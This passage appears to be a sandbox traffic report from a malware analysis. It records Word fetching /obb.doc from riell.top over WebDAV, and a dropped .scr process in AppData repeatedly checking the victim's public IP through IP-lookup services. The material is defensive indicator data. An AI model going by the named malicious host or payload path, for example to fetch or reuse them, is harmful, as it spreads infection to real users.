            Jul 5, 2024 02:58:09.647344112 CEST8.8.8.8192.168.2.220x9487No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.647344112 CEST8.8.8.8192.168.2.220x9487No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:09.647344112 CEST8.8.8.8192.168.2.220x9487No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:10.606524944 CEST8.8.8.8192.168.2.220x103No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:10.606524944 CEST8.8.8.8192.168.2.220x103No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.345479965 CEST8.8.8.8192.168.2.220x1e7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:11.345479965 CEST8.8.8.8192.168.2.220x1e7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.345479965 CEST8.8.8.8192.168.2.220x1e7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.345479965 CEST8.8.8.8192.168.2.220x1e7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.345479965 CEST8.8.8.8192.168.2.220x1e7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.345479965 CEST8.8.8.8192.168.2.220x1e7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.353991985 CEST8.8.8.8192.168.2.220xa078No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
            Jul 5, 2024 02:58:11.353991985 CEST8.8.8.8192.168.2.220xa078No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.353991985 CEST8.8.8.8192.168.2.220xa078No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.353991985 CEST8.8.8.8192.168.2.220xa078No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.353991985 CEST8.8.8.8192.168.2.220xa078No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:11.353991985 CEST8.8.8.8192.168.2.220xa078No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:12.019402027 CEST8.8.8.8192.168.2.220x8c4dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:12.019402027 CEST8.8.8.8192.168.2.220x8c4dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:12.026345968 CEST8.8.8.8192.168.2.220x8c4dNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
            Jul 5, 2024 02:58:12.026345968 CEST8.8.8.8192.168.2.220x8c4dNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • riell.top
            • reallyfreegeoip.org
            • checkip.dyndns.org

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2249169193.122.130.0803404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            Jul 5, 2024 02:58:00.018212080 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 5, 2024 02:58:00.574167967 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:00 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: dbb9fb49a846f49456e5311a24a52f72
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:00.601886988 CEST127OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 5, 2024 02:58:00.726913929 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:00 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 691f5915aefef099e92110d52aec486e
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:00.942497969 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:00 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 691f5915aefef099e92110d52aec486e
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:02.486906052 CEST127OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 5, 2024 02:58:02.651166916 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:02 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: e7a68728ffddd5c2a2309065284914f5
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:02.870568037 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:02 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: e7a68728ffddd5c2a2309065284914f5
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.2249174193.122.6.168803404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            Jul 5, 2024 02:58:03.424609900 CEST127OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 5, 2024 02:58:04.075675011 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:03 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 98f316a9b75f25220dc36999d254da5b
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:04.286519051 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:03 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 98f316a9b75f25220dc36999d254da5b
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.2249176193.122.130.0803404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            Jul 5, 2024 02:58:05.111767054 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 5, 2024 02:58:06.169462919 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:06 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 14df0597b53762ae4a8d379a622f6949
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.2249178193.122.130.0803404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            Jul 5, 2024 02:58:07.029207945 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 5, 2024 02:58:07.518938065 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:07 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: cccd1d3835fd0d64081cd2e78ebc5235
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.2249180132.226.247.73803404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            Jul 5, 2024 02:58:08.218700886 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 5, 2024 02:58:08.917251110 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:08 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 28dd51f1e5097f2318071032c4f2bf64
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:09.126554012 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:08 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 28dd51f1e5097f2318071032c4f2bf64
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.2249182132.226.8.169803404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            Jul 5, 2024 02:58:09.658627033 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 5, 2024 02:58:10.555691957 CEST272INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:10 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:10.666527033 CEST272INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:10 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.2249184193.122.6.168803404C:\Users\user\AppData\Roaming\obi23456.scr
            TimestampBytes transferredDirectionData
            Jul 5, 2024 02:58:11.359989882 CEST151OUTGET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 5, 2024 02:58:12.000936985 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:11 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: cdc936dd76fbfbff727bfa1b183c1360
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 5, 2024 02:58:12.215511084 CEST320INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:58:11 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: cdc936dd76fbfbff727bfa1b183c1360
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2249161188.114.96.34432640C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:46 UTC131OUTOPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: riell.top
            Content-Length: 0
            Connection: Keep-Alive
            2024-07-05 00:57:46 UTC707INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:57:46 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Allow: POST,OPTIONS,HEAD,GET,TRACE
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbRDg3cdyCbnuL8FS8FpLx4%2F2JIgd5paqXe0Q9alDKWT8EaOjEBe5nwZO%2F5Te1mltBYOi%2BE5lQIjXt2SD3NWluOYK2eTwm0UTifXa1xpMtVvv6%2B0%2BQmB%2FcsC64A%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e3671fbc8d438e-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:57:46 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.2249162188.114.97.34432640C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:47 UTC117OUTHEAD /obb.doc HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: riell.top
            2024-07-05 00:57:47 UTC833INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:57:47 GMT
            Content-Type: application/msword
            Content-Length: 549151
            Connection: close
            Last-Modified: Thu, 04 Jul 2024 01:08:06 GMT
            ETag: "6685f5f6-8611f"
            Expires: Thu, 31 Dec 2037 23:55:55 GMT
            Cache-Control: max-age=315360000
            CF-Cache-Status: HIT
            Age: 82770
            Accept-Ranges: bytes
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B3rNonZTEUVkc%2BuHvK4wFqrjwpfiRB%2Fkcwb2Em0nbtjmpKqMY2DwNzWuTum6OuOjsOGH6duoJlGOx1OHQBBJKd6mRaS39uTvUWj0yiPbtxPlT1L%2BIp59Nz%2BZJ84%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e36727cd774237-EWR
            alt-svc: h3=":443"; ma=86400


            Session IDSource IPSource PortDestination IPDestination Port
            2192.168.2.2249163188.114.97.3443
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:51 UTC126OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            translate: f
            Host: riell.top
            2024-07-05 00:57:51 UTC703INHTTP/1.1 200 OK
            Date: Fri, 05 Jul 2024 00:57:51 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Allow: POST,OPTIONS,HEAD,GET,TRACE
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B6gNiH1uAdIdLgY4vxUsHGlZZmFE8kxejtE6PXIrO3UUPlsK4oiYRy9fVfeqjF1EGvF%2FrPc7zR3nbn%2BOZ9GmVAM9%2BarMc7xEXLs3nYxGPYooW7gkXkmtKQqmwFs%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e3673fcb9f191b-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:57:51 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination Port
            3192.168.2.2249164188.114.96.3443
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:52 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
            2024-07-05 00:57:52 UTC720INHTTP/1.1 405 Method Not Allowed
            Date: Fri, 05 Jul 2024 00:57:52 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Allow: POST,OPTIONS,HEAD,GET,TRACE
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7iHYT4HzSSTZTcjD2jYPvbMoyWBmTPeR9s6n7EClWlVmOWLp2Mnf5GP95IvpOu9Uo%2FVTAy86Al6D6LNMPcpnjZpYzoY5QwK7ajcziNN%2BlFlvowP1hb51OJYjPo%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=0; includeSubDomains; preload
            X-Content-Type-Options: nosniff
            Server: cloudflare
            CF-RAY: 89e36746bf627d13-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-05 00:57:52 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
            Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
            2024-07-05 00:57:52 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination Port
            4192.168.2.2249165188.114.96.3443
            TimestampBytes transferredDirectionData
            2024-07-05 00:57:53 UTC156OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 72 69 65 6c 6c 2e 74 6f 70 0d 0a 0d 0a
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: riell.top
            2024-07-05 00:57:53 UTC728INHTTP/1.1 405 Method Not Allowed
            Date: Fri, 05 Jul 2024 00:57:53 GMT
            Content-Type: text/html; charset=iso-8859-1
            Transfer-Encoding: chunked
            Connection: close
            Allow: POST,OPTIONS,HEAD,GET,TRACE
            CF-Cache-Status: DYNAMIC
